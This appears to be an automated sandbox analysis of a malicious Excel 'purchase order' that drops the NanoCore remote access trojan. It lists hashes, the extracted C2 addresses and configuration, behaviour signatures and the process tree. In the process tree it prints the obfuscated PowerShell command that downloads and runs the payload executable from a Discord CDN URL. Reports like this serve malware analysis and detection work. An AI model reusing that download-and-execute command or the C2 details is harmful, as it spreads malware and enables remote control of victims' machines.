Analysis

  • max time kernel
    77s
  • max time network
    160s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    22-03-2021 17:39

General

  • Target

    Purchase OrderDated19032021.xls

  • Size

    81KB

  • MD5

    1a49fe1a9c135ccd9c9f2d9cf395f378

  • SHA1

    24d6ab599cef554a8e8e6b2e3abffb7072e6e1db

  • SHA256

    e4d560c489dba28369b781106a1334767ff82bb44b69b9e4cc6d068feb29ab6b

  • SHA512

    9659a2da6cebb7d4beec1142f0a04030ce0abf08cbf75899dc903115e8160d4277429f2a23d06dcc55c1477424e8333fe8990b7a42de3c06eae2561ae3a263b3

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/814408945828626445/822323767334273094/VEqScSTKqHP3LQI.exe

Extracted

Family

nanocore

Version

1.2.2.0

C2

185.140.53.130:2364

mydnsnanocore123.ddns.net:2364

Mutex

af625c00-d1f5-4435-80be-9f676efc59dc

Attributes
  • activate_away_mode

    true

  • backup_connection_host

    mydnsnanocore123.ddns.net

  • backup_dns_server

    8.8.4.4

  • buffer_size

    65535

  • build_time

    2020-12-27T15:43:00.135192036Z

  • bypass_user_account_control

    true

  • bypass_user_account_control_data

  • clear_access_control

    true

  • clear_zone_identifier

    false

  • connect_delay

    4000

  • connection_port

    2364

  • default_group

    17-03-2021NANO

  • enable_debug_mode

    true

  • gc_threshold

    1.048576e+07

  • keep_alive_timeout

    30000

  • keyboard_logging

    false

  • lan_timeout

    2500

  • max_packet_size

    1.048576e+07

  • mutex

    af625c00-d1f5-4435-80be-9f676efc59dc

  • mutex_timeout

    5000

  • prevent_system_sleep

    false

  • primary_connection_host

    185.140.53.130

  • primary_dns_server

    8.8.8.8

  • request_elevation

    true

  • restart_delay

    5000

  • run_delay

    0

  • run_on_startup

    true

  • set_critical_process

    true

  • timeout_interval

    5000

  • use_custom_dns_server

    false

  • version

    1.2.2.0

  • wan_timeout

    8000

Signatures

  • NanoCore

    NanoCore is a remote access tool (RAT) with a variety of capabilities.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Purchase OrderDated19032021.xls"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1032
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell $cqhsGtEhW='*.*-EX'.replace('*.*-','I'); sal bsbqkQGmN $cqhsGtEhW;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://cdn.discordapp.com/attachments/814408945828626445/822323767334273094/VEqScSTKqHP3LQI.exe'',$env:temp+''\''+''vjkEWrcAR.exe'')'|bsbqkQGmN; start-process($env:temp+'\'+'vjkEWrcAR.exe')
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1444
    • C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exe
      "C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:1192
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\neodsN" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3B6B.tmp"
        3⤵
        • Creates scheduled task(s)
        PID:1792
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
        "{path}"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        PID:344

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Modify Registry

1
T1112

Discovery

System Information Discovery

2
T1082

Query Registry

1
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\tmp3B6B.tmp
    MD5

    6aa71ffda61bad08c679ff3105f3d54a

    SHA1

    9429dcabb7b4d43c5579a65bc51d6808fdb82e25

    SHA256

    16a2ab859f39767918b579699f12e6b2ec23a4ce561a59441492f47cfaac3285

    SHA512

    b7479034dd68be51382a851ee3e238df4fd7a0bb982e85f98a76df881f08fc3147a0a9dc39be18a804f58457ffc88b784518507afdd23975c3c5a66fa6453304

  • C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exe
    MD5

    894aea17779959eecac3bd54d66844a1

    SHA1

    29e6388dbf891443bbc5a1e503a539a2586e6868

    SHA256

    8a84d3c7b92924049e47d255f7f2243e3856c7b4425f671abc269c41ad0f53a9

    SHA512

    bf06f689de1d89e7ea7fe9841db889496d77fb5ab6d538ce53d1bf27a8274d7e2b0bb4744f84f8940393a0dd3673ef3993b9af364ca6b7afb94fbf5d89c95964

  • C:\Users\Admin\AppData\Local\Temp\vjkEWrcAR.exe
    MD5

    894aea17779959eecac3bd54d66844a1

    SHA1

    29e6388dbf891443bbc5a1e503a539a2586e6868

    SHA256

    8a84d3c7b92924049e47d255f7f2243e3856c7b4425f671abc269c41ad0f53a9

    SHA512

    bf06f689de1d89e7ea7fe9841db889496d77fb5ab6d538ce53d1bf27a8274d7e2b0bb4744f84f8940393a0dd3673ef3993b9af364ca6b7afb94fbf5d89c95964

  • memory/344-40-0x0000000000400000-0x0000000000438000-memory.dmp
    Filesize

    224KB

  • memory/344-43-0x0000000000B80000-0x0000000000B81000-memory.dmp
    Filesize

    4KB

  • memory/344-41-0x000000000041E792-mapping.dmp
  • memory/344-44-0x0000000000B81000-0x0000000000B82000-memory.dmp
    Filesize

    4KB

  • memory/1032-2-0x000000002F291000-0x000000002F294000-memory.dmp
    Filesize

    12KB

  • memory/1032-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1032-3-0x0000000071281000-0x0000000071283000-memory.dmp
    Filesize

    8KB

  • memory/1192-32-0x0000000000000000-mapping.dmp
  • memory/1192-37-0x0000000000651000-0x0000000000652000-memory.dmp
    Filesize

    4KB

  • memory/1192-36-0x0000000000650000-0x0000000000651000-memory.dmp
    Filesize

    4KB

  • memory/1192-35-0x0000000076241000-0x0000000076243000-memory.dmp
    Filesize

    8KB

  • memory/1444-9-0x00000000025A0000-0x00000000025A1000-memory.dmp
    Filesize

    4KB

  • memory/1444-12-0x00000000025D0000-0x00000000025D1000-memory.dmp
    Filesize

    4KB

  • memory/1444-31-0x000000001C360000-0x000000001C361000-memory.dmp
    Filesize

    4KB

  • memory/1444-29-0x000000001A8C0000-0x000000001A8C1000-memory.dmp
    Filesize

    4KB

  • memory/1444-17-0x000000001A860000-0x000000001A861000-memory.dmp
    Filesize

    4KB

  • memory/1444-14-0x000000001A830000-0x000000001A831000-memory.dmp
    Filesize

    4KB

  • memory/1444-13-0x000000001C1D0000-0x000000001C1D1000-memory.dmp
    Filesize

    4KB

  • memory/1444-30-0x000000001A8D0000-0x000000001A8D1000-memory.dmp
    Filesize

    4KB

  • memory/1444-11-0x000000001AB14000-0x000000001AB16000-memory.dmp
    Filesize

    8KB

  • memory/1444-5-0x000007FEFB9D1000-0x000007FEFB9D3000-memory.dmp
    Filesize

    8KB

  • memory/1444-10-0x000000001AB10000-0x000000001AB12000-memory.dmp
    Filesize

    8KB

  • memory/1444-8-0x000000001AB90000-0x000000001AB91000-memory.dmp
    Filesize

    4KB

  • memory/1444-7-0x00000000023D0000-0x00000000023D1000-memory.dmp
    Filesize

    4KB

  • memory/1444-6-0x000007FEF5180000-0x000007FEF5B6C000-memory.dmp
    Filesize

    9.9MB

  • memory/1792-38-0x0000000000000000-mapping.dmp